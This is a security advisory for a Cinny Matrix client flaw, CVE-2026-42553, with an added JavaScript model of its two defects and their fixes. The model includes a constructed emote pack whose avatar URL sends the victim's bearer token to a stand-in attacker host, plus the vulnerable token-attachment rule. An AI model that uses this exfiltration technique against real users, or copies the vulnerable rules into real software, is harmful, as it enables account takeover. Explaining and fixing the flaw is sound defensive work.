PT-2026-38614 · Cinnyapp+1 · Cinny

Quasar0147 · Published 2026-05-07 · Updated 2026-05-27 · CVE-2026-42553

CVSS v4.0: 7.1 High
Vector: AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
Name of the Vulnerable Software and Affected Versions: Cinny versions prior to 4.10.3
Description: A remote authenticated attacker who shares a room with a victim and has permission to create room emotes can cause the victim's client to send its Matrix access token to an attacker-controlled server. The leak is triggered when the victim opens the emoji or sticker picker in a room containing a malicious emote pack. Two defects combine. First, an incorrect fallback in the EmojiBoard component uses the untrusted pack.meta.avatar value without validating it as an MXC URL, so an arbitrary HTTP(S) URL is accepted and fetched. Second, the service worker attaches the user's Authorization bearer token to every outbound GET request whose URL contains '/_matrix/client/v1/media/download' or '/_matrix/client/v1/media/thumbnail', without checking that the request host matches the configured homeserver origin. An attacker-controlled URL that contains one of these path fragments and is served with permissive CORS (Cross-Origin Resource Sharing, the browser mechanism that lets a page request resources from another origin) therefore receives the victim's Authorization header.
Recommendations: Update to version 4.10.3.
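The two decisions the description names, modelled as an added JavaScript example (this is not Cinny's source; HOMESERVER, ACCESS_TOKEN, the pack objects and every function name below are this example's own assumptions): the picker's handling of pack.meta.avatar, shown as the pass-through fallback beside a version that only accepts MXC URIs, and the service worker's rule for attaching the bearer token, shown as the substring match beside a rule that also requires the request origin to equal the homeserver origin. The end-to-end helper follows a malicious pack's avatar through both rules and reports which host would receive the Authorization header.

```javascript
// Added example modelling the two decisions in the description above. It is not
// Cinny's source: HOMESERVER, ACCESS_TOKEN, the pack objects and every function
// name here are this example's own assumptions.

const HOMESERVER = 'https://matrix.example.org'; // assumed configured homeserver origin
const ACCESS_TOKEN = 'syt_example_token';         // constructed placeholder, not a real token

// Matrix client media endpoints (authenticated media) the service worker cares about.
const MEDIA_PATHS = [
  '/_matrix/client/v1/media/download',
  '/_matrix/client/v1/media/thumbnail',
];

// mxc://<server-name>/<media-id>; neither part may contain '/', '?' or '#'.
const MXC_RE = /^mxc:\/\/([^/?#]+)\/([^/?#]+)$/;

function isMxcUri(value) {
  return typeof value === 'string' && MXC_RE.test(value);
}

function mxcToHttp(mxc) {
  const [, server, mediaId] = MXC_RE.exec(mxc);
  return `${HOMESERVER}${MEDIA_PATHS[0]}/${server}/${mediaId}`;
}

// --- Decision 1: what URL does the picker load for a pack avatar? ---

// Vulnerable fallback: an mxc value is resolved, anything else is passed through
// unchanged, so an attacker's https:// URL becomes an <img src> the browser fetches.
function vulnerableAvatarUrl(avatar) {
  if (isMxcUri(avatar)) return mxcToHttp(avatar);
  return typeof avatar === 'string' ? avatar : null;
}

// Hardened: only an mxc value is ever turned into a URL; anything else yields none.
function safeAvatarUrl(avatar) {
  return isMxcUri(avatar) ? mxcToHttp(avatar) : null;
}

// --- Decision 2: does the service worker attach the bearer token? ---

// Vulnerable rule: any GET whose URL merely contains a media path fragment, on any host.
function vulnerableShouldAttachToken(method, url) {
  if (method !== 'GET') return false;
  return MEDIA_PATHS.some((p) => url.includes(p));
}

// Hardened rule: parse the URL, require its origin to equal the homeserver origin,
// and require the path itself (not an arbitrary substring) to be a media endpoint.
function hardenedShouldAttachToken(method, url) {
  if (method !== 'GET') return false;
  let parsed;
  try {
    parsed = new URL(url);
  } catch {
    return false; // an unparsable URL never gets a token
  }
  if (parsed.origin !== new URL(HOMESERVER).origin) return false;
  return MEDIA_PATHS.some((p) => parsed.pathname.startsWith(p + '/'));
}

// Headers the worker would put on the outbound request under a given rule.
function outboundHeaders(shouldAttach, method, url) {
  const headers = {};
  if (shouldAttach(method, url)) headers.Authorization = `Bearer ${ACCESS_TOKEN}`;
  return headers;
}

// End to end: open the picker on a pack, follow the avatar URL through the worker,
// and report the URL, its host and the Authorization header (if any) that leaves the browser.
function pickerLeak(pack, avatarUrlFn, attachRule) {
  const url = avatarUrlFn(pack?.meta?.avatar);
  if (url === null) return { url: null, host: null, authorization: undefined };
  const headers = outboundHeaders(attachRule, 'GET', url);
  return { url, host: new URL(url).host, authorization: headers.Authorization };
}

// Constructed malicious pack from the scenario in the description: an https avatar
// whose path contains the media endpoint string but points at the attacker's host.
const MALICIOUS_PACK = {
  meta: { avatar: 'https://attacker.example/_matrix/client/v1/media/download/x/y' },
};
// Constructed benign pack: a genuine mxc avatar on the configured homeserver.
const BENIGN_PACK = { meta: { avatar: 'mxc://matrix.example.org/abc123' } };

// Stand-alone demonstration when run directly with node.
if (typeof require !== 'undefined' && require.main === module) {
  console.log('vulnerable:', pickerLeak(MALICIOUS_PACK, vulnerableAvatarUrl, vulnerableShouldAttachToken));
  console.log('hardened:  ', pickerLeak(MALICIOUS_PACK, safeAvatarUrl, hardenedShouldAttachToken));
}
```

Either check alone closes the described path: rejecting non-MXC avatars means the attacker's URL is never requested, and comparing the parsed origin against the homeserver means the token is never attached even if some other component does request it. The origin comparison is the one to rely on in the worker, since the worker sees every request and cannot know which component produced it. Authorization is not a CORS-safelisted request header, so a cross-origin GET carrying it is preflighted; that is why the description's attacker host must answer with permissive CORS before the actual request, and the header, leaves the browser.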


Weakness Enumeration

Related Identifiers

CVE-2026-42553
GHSA-J944-W549-3453

Affected Products

Cinny